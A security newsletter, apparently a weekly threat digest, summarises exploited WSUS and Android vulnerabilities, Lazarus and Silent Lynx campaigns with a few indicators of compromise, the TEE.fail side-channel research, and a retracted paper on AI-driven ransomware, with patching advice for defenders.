EvilBit Threat Digest - The Phantom Menace: WSUS Exploits, Android Zero-Clicks, and AI Lies

It’s KryptoKat. Some weeks, the universe has a particularly dark sense of humor. You’ve got state-sponsored actors playing "let's pretend we're Web3 recruiters," while admins are frantically trying to patch the very systems they use to… well, patch things. It’s like finding out your fire extinguisher is flammable. And just when you think you’ve seen it all, a major university has to retract a paper because its AI-in-ransomware stats were apparently generated by a different kind of AI: academic imagination.

It was a week that perfectly illustrates the maxim, "No system is so esteemed as one that patches with punctuality."

Let's get into it.

The "Patch Now, Not Later" Department

If you run Windows servers or manage a fleet of Android devices, grab your coffee and pay attention. These are the fires you need to put out first.

WSUS Under Siege: In a turn of events that is both beautifully ironic and deeply concerning, Microsoft has confirmed active, in-the-wild exploitation of CVE-2025-59287. This is a critical unauthenticated remote code execution vulnerability in Windows Server Update Services (WSUS). An attacker can waltz up to your update server on port 8530 or 8531 and gain full control. Check Point’s weekly brief flagged this, and Microsoft has since rolled out an out-of-band security update. Patch your patchers, and for the love of all that is holy, don't expose WSUS to the internet.

Android's Silent Threat: Not to be left out, Google dropped a bombshell in its November 2025 Android Security Bulletin. Say hello to CVE-2025-48593, a critical-rated, zero-click RCE in the Android System component itself. Affecting Android versions 13 through 16, this vulnerability could allow an attacker to execute arbitrary code without a single tap from the user. While the fix is included in the 2025-11-01 patch level, we all know the Android update ecosystem is a cruel lottery. Enforce your MDM policies and pray your device OEMs are on the ball.

The Usual Suspects: New Campaigns, Old Tricks

Threat actors have been busy, deploying a mix of clever social engineering and reliable, off-the-shelf tooling.

Lazarus Group's Casting Call: The Lazarus Group’s crypto-focused subdivision, BlueNoroff, continues its spree with campaigns dubbed "GhostCall" and "GhostHire." As detailed by Kaspersky, they are targeting developers and executives in the Web3 space with fake job interviews and meeting invitations to sling malware on both Windows and macOS. The use of bogus Zoom calls to coax victims into running malicious AppleScript is a particularly nice touch.

Silent Lynx on the Prowl: In a detailed report, Seqrite has outlined "Operation Peek-a-Baku," an ongoing espionage campaign by the Silent Lynx APT targeting diplomatic and infrastructure entities in Central Asia. The attack chain is a classic for a reason: a spearphishing email delivers an archive containing a .lnk file. That shortcut executes a Base64-encoded PowerShell command to download the next stage from GitHub. The toolset includes custom C++ loaders, a .NET stager that uses schtasks for persistence, and the Ligolo-ng tool for post-compromise tunneling. Defenders should check out the report for a wealth of IOCs, including hashes and C2s like updates-check-microsoft.ddns.net and the IP 206.189.11.142.

Research, Retractions, and a Dose of Reality

This week also brought a few stories that are less about immediate threats and more about the landscape we operate in.

TEE.fail: A Physical Threat to Digital Trust: Researchers demonstrated TEE.fail, a physical side-channel attack capable of extracting secrets from the supposedly secure Trusted Execution Environments (TEEs) in modern Intel and AMD chips. By physically probing the DDR5 memory bus, the attack can recover cryptographic keys. While this requires hands-on access to the hardware, it's a sobering reminder that "confidential computing" isn't magic—your data is only as secure as the server room it lives in.

MIT Sloan's AI Fairy Tale: In a moment of much-needed sanity, MIT Sloan was forced to quietly shelve a research paper that claimed, with a straight face, that over 80% of 2024 ransomware incidents were "AI-driven." After security researchers like Kevin Beaumont and Marcus Hutchins publicly pointed out the complete lack of credible methodology, the paper was memory-holed, and an MIT article citing it was neutered with an editor's note. Let this be a lesson: always demand evidence for extraordinary claims, especially when "AI" is involved. Stick to defending against actual, documented TTPs, not marketing buzzwords.

That’s a wrap. The lesson of the week seems to be: patch your infrastructure, don't trust unsolicited job offers from shadowy benefactors, and maybe, just maybe, don't base your entire security strategy on a graduate student's fever dream.

Stay paranoid.

— UncleSp1d3r & KryptoKat